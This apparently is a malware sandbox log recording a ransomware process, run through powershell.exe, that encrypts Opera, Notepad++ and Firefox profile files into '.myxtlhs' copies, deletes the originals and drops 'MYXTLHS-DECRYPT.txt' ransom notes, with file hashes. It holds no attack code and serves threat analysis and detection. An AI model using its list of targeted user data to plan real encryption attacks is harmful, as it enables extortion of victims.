1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.myxtlhs
binary
MD5: be762f9af2ba2083bf815e75fe00da3a
SHA256: 270fe2e1fd184990f3fc72f927eb4a164422be1035e2f4f5af032c29b098c7af
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.myxtlhs
binary
MD5: a13551c83591592dee9af74f8f1038f9
SHA256: 1c14b41ca321750e6dfab115dd606575588158c9bfc4a439d05f95b34cf9e616
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.myxtlhs
binary
MD5: 20bf9c6816329f3d5bf151f68e33e4fe
SHA256: 6894fed55bd73d0c751bbe9db0f08c9ca8025d8f909b915e9fc8a7b978451c8e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.myxtlhs
binary
MD5: ea0af722336bdfd106b5d8cf575a98f9
SHA256: 6853dd1ef70130ea9e4f8a20d2e508f074745e05cb697641b64362f137c94408
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.myxtlhs
binary
MD5: 83db6bae45f7a211b118520aa273a2c7
SHA256: f3dc2482e6dea06bfc56daed1851e2b75587950ed892d4bf87fbd99e26524444
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.myxtlhs
binary
MD5: c89fa797bd2c0992521c8b672ac76b67
SHA256: 3eca8783a0d8b6b7ff2a561a727a1eaadc34ce0e4f0002de55a100dfec51c088
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.myxtlhs
binary
MD5: a5273a982449ec0224b6173bc33b3121
SHA256: 4420c4e6788a4a4a5e5818d4bd20f6ff4983068b4aa53ca9c6e0c2b42d724061
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.myxtlhs
binary
MD5: 47cf7426474028e6d65afaa1e64c1608
SHA256: 82c000a84312cf6d56b653259afa09cb4265c4e8c5778036dc2de5fe06cf4549
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.myxtlhs
binary
MD5: 86869dd8d61fedc7943d9b02547bd1cb
SHA256: 64cb52a436dc2d39469cb5b3e9ff68d4edd47b253c79b944f0ccaa183c890e31
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.myxtlhs
binary
MD5: 4cf267becfa65f567739a453b4000c07
SHA256: fe5855b56b9fc318cce188b24004ec9fb60e453e4d3438e5ff7e704ac147f2bc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.myxtlhs
binary
MD5: 92a53e6dc91587799387314718b77c2d
SHA256: 5f9dbba83907dadcc0985c9458152fae2e47498a9c57bc10b549ea63aee86635
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.myxtlhs
binary
MD5: ca05f4179dce9b0368837fa8d18255ee
SHA256: f9a06970854412c749287c60f58039569f2babc65e5de3f8283df2ae7cfd2dab
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.myxtlhs
binary
MD5: e68855f84ea3abedfe64f1aec70e2e8b
SHA256: a5b73edff9ba0a49f1b5db03fd5674bf0f9d50b9fa827aea03402b12cb144544
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.myxtlhs
binary
MD5: b4a4c7fe8b855b81ec66a23b6a2092fa
SHA256: 7a5cb24fc46acaffdc1e138c3fa41873e2fbcc3ab03e38e05c51a7976731dc21
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.myxtlhs
binary
MD5: bc2dab67dcaa77f2b197d09642d1c719
SHA256: fd539401ad4e7c87da7d8ea93ed9d34552ea7df01df11f663b48ffaf4cef6768
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.myxtlhs
binary
MD5: 795ef6f605b3a3b88dbe7a0683e331aa
SHA256: be9ed6ce405bc43d59f194d93e42a7209f1c1392fb27ed96ea9f61eb31373757
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.myxtlhs
binary
MD5: 2999c20db7f852012a9a07118ffce206
SHA256: 86a768c506aa1662d35c8d0e8732a80de9f9b6746a2ee4eeb5a17d792140d587
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.myxtlhs
binary
MD5: 889776f92d90c5417a5841425ed41aed
SHA256: d2ceeff4d19e3e5952611f3934528154fa3e44587d83c85510ac1e6ba419bf01
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.myxtlhs
binary
MD5: f7d90a4ebbdc08ff8fdf153c319d70eb
SHA256: 9d90d2ff5928fa9020e5f15ad170e457bb6d4b26f529da7d72019f42583db1af
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.myxtlhs
binary
MD5: a155f013414a01383754c661c2efdf8b
SHA256: 6f0d64805604a47ad1bfc30f11e8837611002428b391d9e29737ab01da17c8bd
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.myxtlhs
binary
MD5: 8ef36723f99468e90b43ef658df6473d
SHA256: 1a60064dd5897bc23a121e534fa32b7df18dc52b8693c10d2bfff7d27f26aac9
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.myxtlhs
binary
MD5: 5dcacb630f4d2fdc18bd485c47046e0a
SHA256: 61c44b0536fed8533a4ea8f00565066ece7e76f85f96bce7b74c35aa163730a0
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.myxtlhs
binary
MD5: 0828ecc3cdf50fb7b9806478ff17e23c
SHA256: 58e3a4ca23091d2bf9bb9e53eeca9f674ce22f5425cb048a4743cd59d5125191
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.myxtlhs
binary
MD5: d9c7a4becdb0debbbbda12418e8a649e
SHA256: 7d93f9bd0c36c3f5bae44668a0afb53074754a5f6ff5cce6d052765e684497b7
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.myxtlhs
binary
MD5: 11da85a40b316041e9a8213d45cc4dde
SHA256: 8f9232a682c63dce1c68ca8ef201209c664274e73a11e70b4c9f163af3e92335
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.myxtlhs
binary
MD5: f523af8105e5bb33e1e76c0bd6f00175
SHA256: 9b97469ef5c09825b8f8886d1d1a1dfa48f309d64152c1fce3b6c5e5883a9c38
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.myxtlhs
binary
MD5: 0fddc3530f9e7c02820aebf6ce6b486a
SHA256: 9ce43a82f2029288f5e20f33b310e094e6d94b081608a5bfbcdd91e48fb82dda
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.myxtlhs
binary
MD5: 58520b264d0c099c186d299af277f7fa
SHA256: e63e3bdde24aebf41e2c8cead1110a61c03498898659d5afa726798b5d4e6b9a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.myxtlhs
binary
MD5: 29fdf165be3350c9a56580edc5e4df48
SHA256: 47a86cad05e6cff4340f12cfe6052d5c4fb4cf79ca2695d098a8e35c5bcea414
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.myxtlhs
binary
MD5: 79c10cf627af773b2a0f584444aef8cb
SHA256: 57c7a4576d644d2470cd3f966ceb881cd9a1df072290010282a17222a14ab25a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.myxtlhs
binary
MD5: 65bb5b60823276d754dd2af102de9ece
SHA256: e729c44e820f7cfa853c5517457a67dbd232f5330d9606bbd698ddb7bd470b56
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.myxtlhs
pgc
MD5: 6a53d58320f191dd38187af825f7066e
SHA256: 4d169a4cf2341a3b6b30144361ed782764a68190b9a62c12e315d9181274ec81
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.myxtlhs
binary
MD5: 7f14c5e907e96a35af1c61d4ed4c19da
SHA256: aa2c8fbbeacd44eb880d48dfa3d04624277c239c846e0a0bc35f2372c8d39f5c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.myxtlhs
binary
MD5: da85b768d5e75c8f90f4f801fedc2117
SHA256: 223e55bab07effccd135c727f7bb303cdd808f00b475cc783fc673abf9f71b7d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.myxtlhs
binary
MD5: 778fba1e06092f477694eb429e2e6d27
SHA256: a7dfff68c3d287896996df7a33a22b9198a781a10e4c11c566269a7d13478745
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.myxtlhs
binary
MD5: 2adaf389c6e356096a5c871d64d80583
SHA256: 168510091379a2d8ba12859ef1d7451a27e005e826729c9422a6b853845b71b6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.myxtlhs
binary
MD5: be7b80478f18e774283c933501b4c618
SHA256: 12c86394857df4fb01d650bcb28696df09a7abd40b1bec753884665b283be938
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.myxtlhs
binary
MD5: a6c35b2040345c997237dac8cd313b81
SHA256: 2633d642199d380554a89171efb64b600dae3bc9045806ffcf383d9100bb3590
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.myxtlhs
binary
MD5: 507f47557aeaf02be77bada123c0ad65
SHA256: b274f7be8f9825e5183d3e0a8edcb68852581e4a6d25c05b316e8dc548bac4b1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.myxtlhs
binary
MD5: cff7deabc68d6f5dd84bd04743111e7c
SHA256: a173e9bcb3b9f1b8b17d70a62e4f722822aa7216d11420c0e24c6a7ec110853d
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.myxtlhs
binary
MD5: 2fbf793aaa5c7293fdaf57d165de2711
SHA256: 783ac891e8bf6b6d86e92aef8a653c6ab17dd425c4b8b009abfa7121c73c9052
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.myxtlhs
binary
MD5: 1a199b7874e74cf9f6251ce982887f71
SHA256: a24f0423f5f892126c8df066df6930f2e5084c59b7096dc056bb5076a3a3fe53
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.myxtlhs
binary
MD5: a02b2619a7dc38edc0f5848d66adf42b
SHA256: 488b149928324e90bcae58c1e40f14d85026ec0d21384dccebd7192f6c09b986
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.myxtlhs
binary
MD5: 4c96a47bae545a9d2f0a1b715fffe12c
SHA256: 1d8f51d46706c6d521e0301595159678bb9da4a6bffbb0372b36ac4ec35ec43f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.myxtlhs
binary
MD5: 2dff3ba0d8c1bcbfe46136b1378bb06a
SHA256: 293f3f35cdacc0dfc5aa5f7f37b47a5d41c66b8a6b2311a4542fc522cf76cca3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.myxtlhs
binary
MD5: 825b27c9f5dd3b4832a894645dd27644
SHA256: 5bf1ed8587f43a7dc08dc43f95c22251af4bd2290a5efd0b32ff8fd1c797be4f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml.myxtlhs
binary
MD5: acc40840fdb4135290b85f36949661c9
SHA256: 9bd11f3a5c1410bc0e0d32d2f64d4d6d95d8356ee94f894033fe4ffc058d43f3
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml.myxtlhs
binary
MD5: 0101531f70c65836f16aaa704c743d6a
SHA256: 90150957d09a590deae52e3eaeed850fc92a46d568fee66861bf77eb922e7e56
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini.myxtlhs
binary
MD5: b33d556aa339c46693bc04af7f306933
SHA256: f6504c1cf5923e269d5d059068c3dd44d973b6b9a9fe5a9b7dbe993cc016c179
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\langs.xml.myxtlhs
binary
MD5: 16a31a9da3891f907bb75b3c969c552b
SHA256: e64fe7b7451f2ace061e514cd6abd222f06421ce6127ca5ea2f9e1429a23baae
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\langs.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.myxtlhs
binary
MD5: 3dbc65542a51dda8640527024e1dd780
SHA256: 5b0e231763d97a820c8ee256f123fbac4d67c3b5af9a3597987523aabb5935f2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.myxtlhs
binary
MD5: 041c679736bcebc74f4abaa4efb7e5d4
SHA256: 53b39fd7b32cd9d447e582d06f693e089a945deab009b5941722b6cebad91e91
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.myxtlhs
binary
MD5: f4084fee67ca939bfe1bc4041b50609b
SHA256: e3a7037004006070a3605962129cce348d267301afa5cb03020e339a3d5061ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.myxtlhs
binary
MD5: 2436b830112bcc120d5240cfac4444e8
SHA256: a6b1bd762c2cd4b6992cbc4894d101472f1ab3e673707258d53ee94691ca0915
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.myxtlhs
binary
MD5: 8644e4de4405ce2ad9c3a827c42e2dbc
SHA256: d1f9abce10f06f3ab3f5f05fa616601c4f4645f34a44d3f6d30a1f4d02776848
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.myxtlhs
mp3
MD5: c4cc09ecc6eb0797836359e736ba0fb0
SHA256: 9636e5e77fa324a9e08ce4a62ae19049f71ba9f5cdf9c522b7ca24f3c2832265
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.myxtlhs
binary
MD5: e131cb0d0477a32be58a4285ae021eb2
SHA256: c84b503816677e976ca7b5b5138c49bbeabb3c39b413d84085e6eebe8168b73f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.myxtlhs
binary
MD5: a20f96417f6c9c46c3a999a8a83201d8
SHA256: c659615981d43576e62404940092f8ee48df030fd0ca9bb43d892485a2ef375b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.myxtlhs
binary
MD5: 5b384e62721b93cadcd06ef0e8d576f9
SHA256: 4a92eb7a996796275ed566289ba6a8f33ff276ea3c32f9bbd03dcab79d24502f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.myxtlhs
binary
MD5: 31aeaf17a0506825d1b696942cd3e963
SHA256: 235dcfdf43adb41cb5d615134e7885e87cead5573da90c62bd9c79de56d98a32
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.myxtlhs
binary
MD5: 58d8511b25fb881d198e03adf270b56a
SHA256: a8e12bf2d2f19490270ac859c7d9babddec02b989933e1e8b0ebf81a983d132c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.myxtlhs
binary
MD5: b4cc656ad74b37eef419cedc20c54bb5
SHA256: a2755a3ba4571b0f0139396fc2ebdd3c74122159a01600b2d78699e4a07d893b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
